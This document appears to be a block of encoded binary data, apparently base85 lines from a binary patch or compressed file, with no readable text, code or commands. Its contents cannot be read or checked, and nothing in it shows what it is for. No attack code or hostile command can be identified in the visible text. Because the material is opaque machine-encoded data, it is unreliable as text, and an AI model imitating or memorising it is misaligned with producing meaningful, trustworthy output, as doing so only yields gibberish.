z5fBLaq{x9rG}pr(MDNIF$vg6U(RCzc$6nzR@uBU;Z)X_|M~0LK$@mj(!UxUqm}q2p
zER@(L<eDHos83R8K{t}M722fwOtR>$z=CcTJ3+c5T5E5D!<n|bM=12kw&7;-A8bcN
z1arBWfopxY^aX^+jfmFOqt`wYMTVBL?@4<64rsr5sV;tZ+s{@@RMsk(A2(7CvK$Bu
z+cH+l4X4m|_A$lCxnE|H=Cu3yu0RYe3vQX?u_tF0JUhX?i2H1I<7WEJ)8oeDGBLwi
zeZKPEmW?sd4dd+&M2M_qV#{Cz<Dg|ud)66?Y^A8pL%n^Mw1z_8XN$?`UHH0rad5NN
zpPDOjFZZV7(t2NkGCwKuPhTxyg;-E4(8Luw^cNq>D>TV2YH_5w_m`gNZ}<LF8}uiO
zO)Sf^s+i9%GZ@b=V`+A;R01y9ef?)Ci4|%Q6AEqNQ>+fo@a5P2?hNVds{R_#%6(`h
zJJDBi%GK{%KcG9{B_wk7QUBQk7o?FBH+%=K?X?!CCtv$-Z~Z~*QrqNUVCxFdZ;4EH
z2!ATsnN<F0uVH-Az^drDhg%sJ)qFQAq-o?J8lFA3mAATeanrh8H@m&Xv2Evg$5F9s
zky{f%$M%{XYtTH?u=kh(m~-Q3a@St%J~&f4W~=8=ayJ6n6S-CAck9aOw8l56e3P^g
zh3Mc-Yd4L74laL-CN(LvD7NO05vL(r`FO64TiT2NdRZA{nvcQR382KKG{(ol`(aPY
zMK6^tmcp0LJnjfTx#K2_%%P6nMIk!=bH}8O9u%NrQtrdDM{>5uI|iUq4<*EhEM&Hx
zuo;qOGw%j-FVFv(*rZNyL21m_{x?}V+{6d46MEe3TaQz9yy3TxPD7{M)sBfjnzoS&
z@R=X+Ua)z5i~Yzp-jgEb-MruD0nNMm%C@w!!Tl@9^*w{@h1}_~zfxyt>!D&#=W`yu
znV#73aQWix?e2%t-zKL%S&6^ce$tSO!F_$iA3N+rS(m=;)<%6J<I(cSeWh<^MNI<c
zbdJ(L`}QdR+}rbKd6Aw!$rqQ83_dqF@%)nQ2aB&C%I-)toO`ju_g&RAFB1DE*85W&
zT(EK3a-9*E`nvQcYq$QLnfVoq(GpIO=VM(7s^{&FmC5hF@hkgWhF{<6V2$2`?`vsE
zdFn9nlRr7Ra`r*EO&^O7y|DY!mEBtn=NB6W7r3@hy9Yz>Z%-B#I=k*%cq5SVx{a+5
zK7x%XCc{wDrir)^YPyJ3x-3j2l$O;qjq6MlKeQ)D!8CMbU7X0hNV5%I>GLFx=WFc6
zFV3Fa;gTO=T)!dnJ<J)Wx2uw76?@J3id<5lf}^CCv;Pit^Y|^v2=AtSP1w3*sYu`J
z`}-3v58wpU<<3K6rK0~yyzx}MlhN$9e|mYgPyPZnOr*OpsGs)hX_c;>$deP$DQWW;
z>mlCRYDLBxS&xrQl@=YR9!c_aa2PjHKVO$*a+qC6{PuMFMbgHbq6)JeXV-4Nk-X-5
z`)TjX4K-5B&7|MI{>nFpEZxhJnBTnq#okv|rS^EU=a(_&Q=3sIcevH)JDINo8mezT
z@|NF7sA_D+b-u~jGkDay2Q5*b=VK`oaN>37g`zFJE{o+-(}8K#+U)H;ky*EMB38eu
z_IR~CLhf2OSuPaH>RU0+8J)hWfti`jgZ;};h3+mSnL_V=W_1{vmHLN$H06a=WyAa<
z(i%$|qthbz4%d^b#2sa=2zgx9v6fG4{+w|Rt5dp_L6Afges6qVSygx&hgufV{gz9d
z9ei1hw%-MLlDamevnpTE#Tblqa;pz~JUI#MymU`2hc?mFos)9RQ-f@<od3``3kbP*
zaclOWg`xTMg=*#aRwIkHXoc^CEOPR=o6|{=vC$W;&2v)?=J9A_cd>Cdg_BVjuUcQD
zzlBc&kKdM>PamA@=`b9EUhVwFqTU$N6LNh+3_Dp!x~FTRx@y|3L>f1KA`HKv?vriZ
zXg1#)<7Qt`E^^a9nXoK%phH#X%V^xpuKAaVZ!ebxcO+cDX_LAB(yuiSS6SklzX6oL
z?r83-<MV<n6d%1#8;e|6VyRdA*PK!N<)gyVepP<pqKU@Bn|ynvij~4|JqsbZZow6A
zOAnlreOG?iT;y$<Pqpm(s`ytG@2k&hw7g@U_*b!7d%;%jL*0yM<?EV~b8;UWuT^gy
zt^XZg`LVU<RpqC)4?S`RTW>2}TI-s!{g2S`NlN~6@5^)Y(N~_-mwoR0d`JH4pl0=%
zR|7x)$**&S3<^&q{Z&%<HX?Pfs(Sd%uBvZb^()&^4_>BMeV;UY9dvBs@%^eF)Aq`{
zjy#$Xy1X&xbMWkmVQYJdUkisdMT~X}3)_icyBE&>&P)8d>zB@*Z<kNMJf(T=w{8sc
z8hTf8nc`M{IJm}7%#T1h<t<q)5R!M1vZ_;U2@}9}KFz2urAjzM>Fmpy?P{2(CFk$&
zEr!LN)BjPLuOzPg*!}N3|I_P#*+&N<a=1j4H~rgY=5Cm+$9c@8A|JZS0elUJl2trm
z^>7MS2X`Lo`WorvPnD>~rE7aHp@oj13_3ef4mG{p`h~cMKbLB&EQ>(BMeL%~oq#Xh
z2-#{hq^S*mIp^TLj1plDYv_w-hdYN#Hu>A@276|`I-??epJ{#W58y1m&uci2V{KAh
z;Fvn5vg6+J{o(Z?K?#wHOXe{tx$8(sB0~<EFSK7kLUZ##iai92l;J$F^s!VamMMe~
z!@)xMeXz<x9PBWq9;QfsqamodlOkMIqD?1o#A%omoGpr9xQBc#D5b^_kS6}2N>GAu
zRU-$k>_nE0nPsY#uZsqNOQPN!$iZQK6wpU>cV;`e+ZM&89#fVdQgyyJNf5SNf?*Rn
zT=QMo2$cnfu9YFgCM8VPb(NvFdpUzpymV3735reZK+H5QA(t$NQMS;BxRrv-%AEi(
z4j{3P1f+qb9g;kpndiEM^taS>FXli*=^=#*i7<I`EL>r*5az_Q6X{?>7N!7%+a^~u
zZ48o$mPB-6ngH?;L;D3Nq0$e+`j$YUv@i(PaMdAuMg$@GMvWo_=bKg}TO2!w4?}ip
z><T0c6TD566SOoO1N)&;0KJi*LKEzzd}D>ds}@KQa9<S03jAl0qM(#zM{Zwr;nfsE
zq_UNvZ&#^V8DR+mba5tz1i~K(9f~+2@QuYVuM2{$DwJh`uH|QOKc?OV1}*^WCV4sl
zH1K4tFa#hY8&^1lY%9ovSP*gQb`&860Dd9qLX#t)!U`S4ZmQyhIe=+bfe4lmdQ(^i
zKwvz8<#)ABGx5*&?OwD$EB?MXY>Kk+s>27{2my+Pn5V6H8MgnZq79~6Kt6{tM}-tx
z^2ivDKuiuYg^o`{5Xm?|nOJk9$n=EtKR!D{W^R_yw~Z8ouNNp={t_0gCIeep>G|dJ
zLdq(3sd)rfb#58VQtKT78smOTN0pfR`DkR0EK~RfyHwe8h~WAhIzp|73-<{ltZ^cT
zEeZ1Hohjy(Gr3U;JT-(N=Sp9JXoTaA@x$^M@2knU$X;GMq@3(OAX0c3AP7c-CXU7H
zi+SDOOV-{3irnTb{S-KmYwCzhBrpU~gu9SUh&9Y3GjG}pgF0t|NXT-3;LaX$2S9W=
zxSUTkxf&GHDjaAHR}w^S6?P5#HVDWz<K<niN%cZ<q|mCqrEbyDlPKF-R+N_74q@*7
z)*GGRk&#+i<uQB65z&kMs6@i}(3fY$H4!h3BsFgVAhhiE&S}F_WYnR5junUtN3bKZ
zm+=56s9o<U6Rra2Zc;*jxCY$%UIYWBHynrrA)`}ZdG((mwB&!`K$xU(k-o+ybx_C{
zc}lqISDd4F$NT(|=l4}KP9#A%!oY|LacUb$2)_LZwlXZhy9$}HT0cR9UO-@ubsbLb
zW}$vJFN8E22MC1Q#vNqRP63ea6$I4Bj0iRVLzeDO=KY+FN8A;}*r0~#?X{ajdj1d~
zK@-A<Zen1vF$%^pJn{}2kSgPN3t{Y$*g}UVB8QNB)_M8sGmp08*TgLcps19Q;#{fC
z2C)Gj+ZBESR4>{vNKr2h6~i9lwH+JTIsMU3SC+V!2kx|f$bd-##89p_X52q^Li6*=
zTo_Wd8E2q?WD|G^ln9va!rkco*HSKA2fA>8Td_$Sl<--_Kz^PGl%oc7jtAU4&fJ>0
zi4DY2<p<oC<PFabQ;|^0XHfuE_iHLn>z#_j-Eiz0`ALd*%HbVTaI;AAaJ%AlZ3u{5
zA3puz{Iqt9l_4rrOHH<u1K6NFfWwkkzm0K)g*gle_Y?sj^1cgChZ}#*9$@`g77|Y2
z5TXU9Y@jYC6!DBMHcUXKfUt9%I^K2BAo_Grwm>cqM=m3u@!*v_OoAq|m`&hc1QBa&
zXdNJqQAL#lh;F(-15J46BofHMCOnu8qL-|>VVGp-LY7#@I+6$=`sgKrbOafSFkGKW
zCPSyEL~ExJYhX(di0X|*uX2QKnK*AWQ6r?W_5W4-vDgq%<q60Fj!2GvKy^i+aAIdh
zf$LhNQBVSJcnZKse$U4tV#Jy-#@jfYNhSt8BkuCB2<Msbuj5CWT7r_egh}VAFZ2r@
zt0Htqv29-GFvl>|QDU#SRQza>F9m;+Nsz0>k1^A{3Zx?o4%-~Vq}51KmZjPwNnET<
zs;5l)jC9V7j77#kLctD1Xa=4tdqrICs;68-fn3Xs9KT&$K2wWit15eC246n2V~CnQ
zs!Bvd-A0y;SchaMn6O%Qc$c`+8&9S81xk4=%K=YWJ&M?NzT|^YxqspW*mvdo4g?`D
z5`d@w`=$oq6|Kl(*@v+8HHP&|&gb^1<efbA@ub2%sPbt~<v-sRdd1!9L(;Z{h%^Sl
zHWaJRNE^{iKvNE}8<N}`3E`{pUibuGdzS68%1L7lGrU%+msVz>Rsc)wE4>mMqw=dW
znw=?JPqAfdl6XgLy=J8pzN?vY2%+!KR3lQi$&ywC$ro@enR$k~tV2;{1$7c0;)$ai
zWAha?a4BA}42;hxSdsTz0-_`plBkL{|7BW6cA=rjW5b+Sk?+Rx_f_#`1}bDPVyfoZ
zk<RoZ4H`}?DHlgE>yv4}yxho4ozzT|lcA;|4r0H)8}8d@<|iS479<3Muu+`6Y>`Bc
z-dk#{N)*fZQ<u~bNAhNDdP<R5W|3u1k>T%8hZ?_W6&Y(LNu=lM8T*CH6h5|Wd2HP-
zu`?47JNo5d^EWLQ6Jo{?i(O<KfHb=yvFq`^UGqh95At{3+9!8R!ls71P<vD^?qs?z
z!+KFd%V>7Dgs^CY#9Izj<_iZ?t7)=NOUhSpoLsOw^ZRa8jNyAD9DL5`@;9+BJTdcP
zyPb1(yCrFM-ZY0|n#&w*ucZAxZ+pI9vHkuz`-75u4tei6TD&K6ZqErxhf}8ZXKHqo
zI;+eAl5vs_lqIZxi0y7wsnJvNEgY$3j?)!M=j&?D4aLqabAnSNmmA(LH;Y|v&AHr_
zbiL>8`k>f#V$SuEq}yX}xA|hX=iM#`9uU45iY5%XEt)D>@*H=ETC3gHy7}$QRt)Bq
znv)aKOzNnjnxyB2cWRA=Rw3^d9zrr)W8cQaVsb&Lp2Hq9M9QME=guelvJMG`8=g&$
zUTPAwJzPBR{XV}EpTz>$9<yv`A7UiI`&gIH2`RsLyzd7S<FQWRAc($8IO$Z0|4ASG
z;duG;X8tZ+{+D`u@_PL4he{MbN#j>N3EU+WIB|+pFXdlhW=%mI<dp1Hl-#TN(`f2v
z;NzaKMpx<kQYwA%0Y{B2z8MD}5z?eem>wt${?K#arOyGrPZ;(|2;5hN*ON9(Rh;H%
zNS#tNC{RkqYcg(RV`@#$7SbWohb-QO{yBU|Y?yxNN$5f2vl~BsnxZh@Hxx{K4<kyI
zZk7aIn>F-4l;-%<cp}#J-O0nJ%tN>14_ZGZ*#4rpHTu5wIhx}eOh^sgj8~~QV|m5P
zT?Nf9_(tTF?o+Q1l3Yf&(cuwvnE4VqjP5@UPljF#2wXOyrA8U32D*pt-815@l;$>W
zt`+>|_?cnX(sbmrr|v9J0(yTZA6jFy`s=vnz2pD&x+DG6RZ}&2rEcc;G^P{CIKLxF
z%cjIKV-i)wQ1z6=&0YF_dv$I`z4>LW6B{8x#VM(YdillsmBsI$k3YC0Az)tEw+!lC
zMhNy3oI)pP6J$c?PoLkB=x2fTwLqm<;Jj`orvAn<EfOdp@gk(egG2Fo^QYra$3Gz?
zHkBn6oIbOkekS0zSfEAH-J9{3{o>2YQqImJm}L^P^Jic0IQPcy-21X~pXSefosSm{
zjXxZ62tIWF-tc*$CCM)H$iFvjZB;=De}<@k!W_sD_s1nLVcUMv8veK!M8?d>`QrqT
zvdp;a!nk|?y!s|X#2*(s&gAPZFwbidmC6}A67Tw2GF9%S2l!_k(oCf=!7E48RW>sf
z%F`Qo>BlWI#W$s+LokfZQ~_lvK!&xeob}hDL8dRuYypfcPm|arNN+L`s$dU0gI`9-
z?n^(f1wIgbiJDxYA!J)3E7d>eLrtn*U)+x6IJ45DpZxQVi61L6&-*QtZ(?*<ee@`7
zF<((!>BRT^9e*SdNk{qR1!@&5A3Y0oD{$J2g(iQ#8wM2Zv|6xSEV8p2U-m3^sc0fE
z7VoQw_XsH2pA_f6SaK-f6g{9c(keE5vGkPe$(Vq$Gf6Rl=0R3Gi6;oni<)6#zsiR)
zLqd>;QxlBOCPgML9^eyLsYql}1o!NV2Cx|cp3_V<)Vj0-S#^8y{Ahoc^lD{$(xn!w
ztZJ>a$v>BFRe<K<AaC)s!Ya7caOt;fVNJj>$E3KJ$5(b*$?uD2iv`92TStdO4h0kZ
z!uH`c>B2`iD5f!L#Yxs+AZ^thf57DE4bK!h8!;Uw8^j?nc}U+q$S<t#VVPL!6e|X(
zFN2_d5zl52lKa?KUNlQNOiZ#h#iT_tesNxUu}aB2)R)MtdJcLLr%46O^+cB0nsCEu
zD3k|NHxfyFR&i@UD+y8xC$Py-VYuOj*R!xV_J?kFl^7l(N(k|hL$IkNQ3;UR2WU(L
zv`;RDU(ANuQW2pGNZv$wrC@6+FKh|a8G0a8^Gh?<)l$f)UR~lva$^9i(Py=>NKU*~
z0H$2Narpg+t*Q&JHGfiM*<FelR+N_!Bj^I4*_z!mb={QO-jh_O6<Np_(_thn|G`d_
z$V2Gw6vJ~wk}lzhAj-y&$mAd^=)yr4FK3gXYuszez^$68x7l(;M<?hr_KiPeX!DuE
zXyBGQ8J5jK4|2+p3{)#1k^o|Y*tI7Ks3QQ1%e$EC0j;mZ7GJ_FToOvNhEv@{nLI@E
zbM{3#@;teLzrTcl;{2UN{E8Cpc#h5xC=7WRl52H!J7$?I+UfzVk}Ku6f|y`Bs+Eo8
zlF<p&!7&gOdkH42(<Ye9{~|QKjQ9;D+ym*)!@mCX=5<3s%oeJpU#Cq&m-w9w4Gd~L
z3F5ebSRj4y0I&Tsh<ir9yBj*(AA_m@G4z49(OU?eL_{_?VX^*5i_~<SJo}3-45#06
zJuWux40vbH>3^E4&V&6T1HF&ynCv0p=2jA^XV?V+<z2+HTl496eaXl#xn-+*gO+rm
zhhsB~BI&xfTDy2saXarZ+4t99JYv#?N-tuPd0nwi$Ta$ge6lD_@tM~Y{GXK44|?4g
zVbG6<ienE5H0Tioco#VJQUsAp79><f2f#LbkTk!VE|kI+%H355lCLFl?(L=`H=WSZ
zE=bZE;$jK{BqL18LK*~&FCZMXh6<(&y||8G^4P&2&=Vip0>D@OXjCPD2I(arVE##)
z=*tm-LPV5Mi0n!PohOvf77nD>od!^nDhj?lp<%%#mC%)Rp$Ia{7Ze!U(VKxVB5)^}
zElQ^2@_B`Y9CVa6e1VOM1CXw0<i9pVpZq#Nz{G$v@&9$f2@M+70$s@+Z?fRu5_$*#
zh2&rEwt$TDb>XSO*ohAcqOTTsUvVGV&&Y2RICU}fy6gE8!b=6x5M&ik2xLQrRUTgk
zP*7*ld`_KrHEiSslCJ@v=K7{6K$|pWY9pc~Mg({cN^r?{q(2LJiIghn_6S2pA087@
z8bg21k<iG+`~x_`DhOW!Jed5bO%$l+eE0&i1rbE06~#2xP;|PG>bly7Gdh7Hl#N;y
zYs%MuEu__YHwIYsW20KX7I)BvQxw*XF+hjX<eZdJ5`ZA{UY#a4mMwh_;$Y5@R~JO@
zta65#|FPpL?`i<ziO-=xFw7c9^yhu%4*Y%DBAft<?8km7W^eBv779KFmDc4$n5j7^
zg;Ge<<Fr(2dfY>;Djw6WKuw{wE+CvXOjQZ_1^48preleeYON7ZhY+y>xle1JS}F?C
zBr*PT(h8fVhA<A1#11;`5zj=KTk*;Z;A2^`yIM(c5@fJM3NjuO10!&V8BichsIC?%
zK}-dR5KcyFI$-dl!>7-;IU6`2{q93ee%`2gqO^PYP#P*zNrnED?sa-eNgJJmOWSXn
z^_Y;S-rXS&j64GZq?>WW+8hG*!1Hj9EGUGqt<{Am;_Uzl5>yguITV6cr0N3PWx>dH
zZa^CO6S*!9+C4oBt8&K!V%31oAh2vmOGiV%7tZ;r1V9r@h30!UUc%vl)W}mv0m$OG
zl)Dw+IYhC)BnR<z?8Jkp4U8k5A*{rrGtv57dMefy8Ip!~cdX&3S{z`7WXMHxmol7y
znLT27S~u*_!m$<VK?OKvhN{1jhDSJs6Ng05;>Ji-`v3u+Q_husm1^}8p6b3r>4aew
zyy@wpsoLW1GzCYxmy$iQ?%7_yMHPmR$PzC<P+WWH9z0R6F0}xq)%8G(pk6mBuOA-f
zP_9d<5tr6;<~(pUd%2P39u_o0k<ZhXob#~%YiK93>mT<%b^0*lzL-C*&IN$Pb;!jV
zb{ABlcjaDV1ORcpPhBF_drNWgbBy$C1)y|3Sm&4Fv~1!}x|h9&p;2Wh^CV}ahNfLS
zl2kktS3!+Fwnq^NHG~6LfOrq*bG!pbuJgE{0q}8-uIvLeJ2?F+dZ=JYK4w^mFiL<3
zm?E*9YjC@WuNQ<5P@mw8=LuCCIJm^IL2-_(=9*_k61piz=vL|y;$=8~^0X2HH94P(
zh4ghiP?EEp2^rJ4k{dg&(>@tHp??>1YEt`aO#RuVK`_n3CR`F8tk-II&ket^k!okV
zzV-ucFi5y2??^D7JBI$y0i`&kq>TvRenSvxXJ0~^vxl>jIwA@Ajv0aH{hE((-0sX*
zbOenLm)j5urrmTqrha1NzI9TC61AM-v6>50&}xOgIuEEpOea+2BDQ5(0=2o4kKg+`
z%${oD_y=b1*mz{fMI>H*RKzuCk0Kv5uoMTSB1Ui@8v_veBSHSfNAZ!4<-80zNC(3~
z!V4E+{w;N>BsAJ_<H-;D<HDn~9X|t}-tV|?n{I*F9o~J`eyUOtK&Zf{nFBG0es<;>
zxsuZpyf-pg@EJE*&@JGCH2ln0d++Mk07rW|X;>BtvVN#PP<ih)^#Hn*y2@gR9-~hQ
z>Bs3;!YOJFWOpFuu`QuE57EPLht-=Z54h5U>$14OQ6V_aa>>KErAG7w>z=~Lm`wAv
zRCxVORrMt@Qa?P^ZBC%!>K+pE`hm&~k2S^CIYGlXQw?iWnlaZ|kIG(-Cr#TM6GyN+
zd1R3|DpGxwtBI=M@Ev?Z&AYk@IraOv*kVWF9l4n>hsH<LIgc!>fFZa7Syd^7o=S{R
zRp042M)#**uyJyOHjlw%lLbO^saP7rkqQl>r;nsK9dpw{D+U`wR0C`L&;ffAO@&}e
zf=;}WOU_?_tuM{W76_3Uz`(3+e%O7DB(Agfxz2ofEl-KcbxMtQH%x^zqvB;aCYfO_
zW1LShl-uNHhnHuPe0i4)RVr?b&!>HtT}t0ns~d#^00j44IH3Om)!I@{Fdr6Kp)jdT
z;L&G}Tj|y%K(eb=-vR|3+)~wwS<laC6Sy;Oai+z1C~yD(_pCuyn<8KWy}ScqbH+Wf
zi=Pk2h7D<`tfPTeV;I3Zyx#PBliP{x$5nx>Or!sx2wWWuBjj_~Hl{G6szRkspVnj^
z_A$NOnPsTwqsHCG+IN-?uN9ussvODRx3?4~st#$g^KtY&?EMr2;n}=->>+X|!beng
zsa1ZK5@-eYD-wDl`f(r&`)r&ss2_%gu*c?dv;9ghl-Oxsma9~VGzJ!k?Rp&ycY~b8
z$%up-rf-`jM|q3W-(ymJ^unfM%SX)fm$0?hLxAnYXA8mM=(}+Z6M{x$HMg|k-{SQX
z=S5!d(7(fc8i!-@ZmA56n=2TSqsNP<gWiAl=$O6U7T=!paxLO_M%CxG(|1K)@z=9Y
z53cC7Cq2q}wec+O7CLKsd`{%`=J@G58`s;<e$9Ekt;)J>vDid42Y3KX#tyjiVeiiz
z-k)C<4GPoD)aRFYNSDN6$)_X)b%^1!{+pt<+L5{22AU4~j}Y`bv-ajLOQy;U>ik+~
z=nfvlrr!+vk{)y6U{r|0sRR{6!8A2;{I!sU7MG^qRgf38qO6-VCh;sLRRQx>%OOBz
zU-WwFjtySAcfbSKvN4m530Bf|oOCYjDjCW>j5zdb$m>Xc@yy_B_)z~1wAYU#k5Ue6
zd`fyG<lJ@XH6~n-7cd=_FkMw+6K;aon#vmeQE`23)m{ua6Ln;x*5LSi+kJf5$40%z
z48rGdkKL71monl?T@D<h$ve&!w{_Jv41OdvSU=jZ?71f7b{Kj)X*TVSS()<fV?lS5
z$B)13X^8wBLHUuiX!z??rP1FA&)rs!H~LWB?U%z%_W$>kaVNi7WbRX>-TsN`;Geyz
zicukN0_Q$_F}rnD@i1&L@FnY^dFOvGK2kpIoZk#S-E!-~JLj9X=2m+xZjOmY9DiK7
zh;it+@yR9{kw=mAa8FNtZ}{FI=ggZI!kZm0MZ?cbJm)F!EgH-&#GK1aezhc>SktmA
z;?R%4SO2QbZr^HMg*EMez47jMLxB6218Qd;7b*2!Mn!+DJ}UoYqqL_>9{Y3KHs~Q=
z{6umyKlhDG-oT2IX2PAOsZVW1Ri6|dOfz!ZJ}3MaC}Mr{M&Hfjv6uD@d_MX5cjw7F
z(S>4iUk@GKIhmuF5M_}3)ze`6Y(v{g*Au&5gt>c6&ns>Y`pLei_|mts_rUs%hW!tG
zHFqvfMMu-0UtWFU+x;m1K$1<~i|6j`7Ojy}U(TLU{Be$-^eQR(XK|$Bm+sSNId0c~
zB*>rJ+_1NKxhrpbMfc#Ri4%9;+vSCchS+XB+hz8xUF<dH$<1%xr){5J7W=oDd49Wa
zkJV2j)4x9s&TlQ8xSK>dm?AG|uwy>%{PQ*M{M*xkf4B4Q{KwxNyxu_nK7aPlQ4qlb
zQH`Jomk)}rf}k)c?ig%A5mCm8&XBRPjf@>!hT<wid6Th1Mql6&<VumsWT<u{Q<uxs
zTV)y`Q;oDzO&n9r!c#3+saB1tJGrU5R#SH)(<oYLc8+QG;b{*4qw37#p?bsqf6nYP
z#u)oHn6YIk#y(`3u{D-zWS2CEh{{$8)yy#VWo#uCLn@*|>Pzd4rI0kDqEsW4c1dWR
z-#ov+p6AbVUiW$3_c`Z2_v=2_^|{`k{2VWOPDK(5BM;)4SU)4KKb;#G$K4i(dyD73
zWdQ|ZVlfdNkxp!75Ch4wt*qSm=G=tA+`S9A`%!txMtQ09yaRE0hbVap&3R<c+?AM6
z`IS7y>$s0(L|qa$FF!wzjvHeE_Zj}t3}Q5~ppsrt9anH7zu;tZ!KuN5GYbXvsKV3D
z_y$VB-{2imeQRb7@iacNC7*bCA-ZiLx{Q~9ElyITKAG<@u;b!j(d~tzyKBd~;)?px
zx!nu-*jzV3bMb@0;)nFeUV8DE5%*qmk?maZv;2~&=8`#hNgy5fmVpb6!_5&(#_718
z{NlUUN<I#jeqJbjN#VY31`4Pkj|v%~md?{l-lMF(ER;!5JOEwhN5|pGG6XV)hsP={
zg0szK@6wB(#1$%fmD?!sR13<XC)xD^;5rLfqk|;^?0g*dw^6xrL51;2OSPd2NptyI
zDxgG`!7pOxiD)G%PS3c+@NlTf`%0Gr%MHd=qZHm4P?^_`z*BMa0)XOG;dr=$YFzE_
z#d3?UzSUg*E>1>C1jx4|gaQfR&{K&IwZsz9bwsSKjckIw>}JpE{qZ}3jZfUB@C-sL
zO4{)SEI@sYS29T|A)>2zk&2dxz;@yQcSj3wqNwFa>ie3EkQ4Xtvh$0e5+9$(2XOYs
zkM@vajd6YLn2UH4w<VImkSP$O68N<rsc3x^sdxyy#0+n5DJ_dX^;z}g>q(%v9lzyd
zS$|xyCZr~hh-)Pl$mten*kYC15%Nsz461ZqfPIP2wL4F0<s;YYVbvOIToI|54$O%p
z#YR5<4etzriLmQ9gRwxKJFNIFsScBjd*gLVct9GZIM5S{yLnjge*1~L@h8GUig%qP
z#d;AhGO96+5==BhCV^Obk9ho`dZ~^mr<IK5O~$A4NH2%Lxx=I#_rQ;#mIRYyp9)Ch
z{5pbeqkdTZh7XPA&n+k47xl#B{v1~10SyO#mb_)LXBJ9e86?*G+GQXtB9=Hb1Qy`I
z5kZrldIRia<ro$06M*gAJGGzJ5Xh&@`x@0a=QNh$)h$oeo<D3EeY8`#o_z6qf`*k}
zJK7;9;S_(T^`5hK<tPl$Af}XII&kuW6K@Aks=9){bfU*|;>C8%_#$fa^CtT}+}HWQ
zbq4%iXj940c+@a>Tm%VcVPgB??o3N(0i1MDafdhS<S_UcfGRU<eg_jT3XtZk$VRxN
zvGW`(Kybe2Vk@B$ITa7-AtJTJG6W*RKrC~DTCb%5*RVWQISd-K1B4`yMMnC!<8#Sv
zm`GWK2x}S*3?%ud4WA<Lc}g{?i}sl8S`>kbhG3fS^GSJ0$Dy1S*(eT7(7gG%Y$2tz
zmxyf`YJ;X&Q~4T4#mM8-jcwKK1b%}I3CjdJWXb`Ms1)4ZW(RgKSwyA)oHBL{C1Q??
zkqAf!G75c5q|9cbKeI^knU-cZN#vV&%NHa<Cdv8%sG9^QP?2fux|>n}mZ>Zu37AR(
zJWP=UF@PXqZePU5o5)TXcdACA)f<r<6&aiW>=1*g0*TBCMtI-@@J+mIN0O{*rK~aj
z@<7PhSq%`wCuM}<etUsFzb*({NZH<}tDX~U1mFViif<V1cSgQv3y{ZXMp`0t1t6-@
zg}`hl;GqE3P8VjAir)>5a&i6E)f!7Y5<>J(GErReVYlP;KJNH(Sn((yf2q*lX}fAH
z6MdXjf9+=IMLv9r3}F1Qs$v;!CdQbFfl`T)JeeK<6^KVh0aDB(ibW<GvNmK0ZVWIn
z!i_{k`%Q!xY+SrHbrNF0fIK7<;bZ_O_4NZ{a7@f35Hmo$V=QLIx55jV5S$^RCkar{
zy^NtjUgE*U4AQ>>c0H@g`=q2SUGqu>8N)ZO#a2icr0!o~+^B-0a$aObK8br6U8%YC
z{HZgQK6U{#JJ|;}{CUU_GK&9eOFjUlkWt%*WfWOZ4biPY!Ho?}WC&k_n`ScCg4inR
z+e4P3lM(w1`N$W@yZsmv3wqJwre%fxR%SS@_<wks8D!XIh74w=e-l~zYUnlfMVKcK
zv`T{A?ZCS+kq7a{Tg&y=<73=d@PkQ6cq76;k*Lv*3~Ps`Mc!mj??_>R(|jyU7Xc?C
z7a4#-J7$`S6#;TLTCp7r><I<{=fekhvU3}Wg-k#M$if*|Kf!IL;5Ix80taMM7{Iwj
znUh$FTnb)hm@!n8*!81zP$alr9gdmi$>R9%9-ge2h(sg}%00eINGc0$2JSDS>iGB+
zpZ~U||3|$@D#O=g4-sqZg~fZYFUe<S97o?w%Qg|Q<9tj_hT=WAvKbK$_JVP&_NoV<
z{z$t_2ligSdYV;7K!fpK@o3jsV-vt8Lv*!v$s&+=!-S07LsmT<1^zh=PlEQWd!d}#
zVBFoIi_rpVrSZ82$XtOk1drk}v}+*%x*_rwOY849?`a|EJU130z-wPZoA`}GUAJP+
zjB}gD;)E(3--(lfSOg19A>Sb|AyY}$HCQ9hTJb&~W#D39m^buL3?h;wipc^bW(FSi
z;5LE$6w`p65*QQOkpp<tjaK{_M<D!C*AyRnK8fZw0|p)e;7QV13iR;tg?Q3~tTJ`V
zfA<!z@0>#Eh*1O)>I>!^`vz&r0fTEi;rm?n<fW<FlBqY2XMUNC@^~2FCVs#G_X?`R
zNY?K3*{DYV3`TBn$*K`zMCY86qA8%51PdJtpHD`xMOXiIVHbBnvZx!gMaT<}F{y0L
zH{=dOJ~Bs&!iz*9O<!EGfdK}<5i<O_1<Z@8%%v$GnNbN!ChWx{_gOr~j3MC-#xZ==
z(?XCe{Q(ergG`tnerrA-{;LXB*$CetK$wt;5hMvBp6RlV4`1m+NCn}n@Co_L{u5$Q
zjRD+E0QxY)!~EN~wm<l^5jfA2f%0VHZ{vG-6Kce#+SI4(FXM;sGUt*MpNfVsk-&74
zbfrP&gagkQfY}{<PVoq)1E9;w^2w8l31@$>%KU4%^X(T1NmzOQ$#Si7yK4wJ@|jZ)
z=U?JwU-AKLJ7UKx*_#Eq8g1tSS#2Md&VQ&t>@n+I`Su+9;Kn-+?B0OPLA>?K?3NWM
zbSHjmArFxS2igDz;WNU8h2*k)=!-PfgJ|6VWInG>ru<B&EO48AeFq4M=3~AwQ2t4T
zvuv_=l#4e{2M|Ew$s3g(yfQD5z%(*m=93YR1uyrA7n}iP#2EY-mB?s-81nDn-l~`}
zpf*WT4`^7JNSVGxE(e%VF#Bv313CWye1?~Kh=0~sh#X9Of+>egiDl05CS=-yoKILg
zKZxB?Sw#Dr4R`RncVICMh-5r+YTqm+0vHluZvyZ;Od#F~{!{>F{e5O9lszw=z&F;f
zYr<RoyfEI(eb2)=dvh6~{tJu1u2=I-V*igUV8>-ZiIrO;{*S<@F_#6L0Bz?N!j;6H
zw96`=-Jnswx13IJQRYF_=9L$_WbTusJCv)-`=s(=t^E#TCNB}^i~7_yNDCTdxPteu
zX1D!LRlYKS`PL*s2H>>=%{PRZ)V+&R<WjX4ERl}lANrLdzZv@d2IEkMs?+u#e?h{R
zvF<VF&xdtL4*!tJJek2;Pc*b;?l8Khsj_e;1~W5!n}>z7K-JDK!|i|&`!&4v%k;2p
z2N|fIzO?;;tl$%PU<V}ilI%IW%y~YxpDN2c{S5gPJTtQBvWG`tlqm^#fm^tt6#hcK
ze^dLnoKsWx#Ik;BvahH>9$A)0{_`#FPadn;@bwKf#OEDj--DQl4E#F_7i8PU>30pt
z<Lx1enObY#A+}U4dj`0_dfR<J)eI4GOFLM6Cul+*b+rYl!b7K$)KW!Apds%B0J4|!
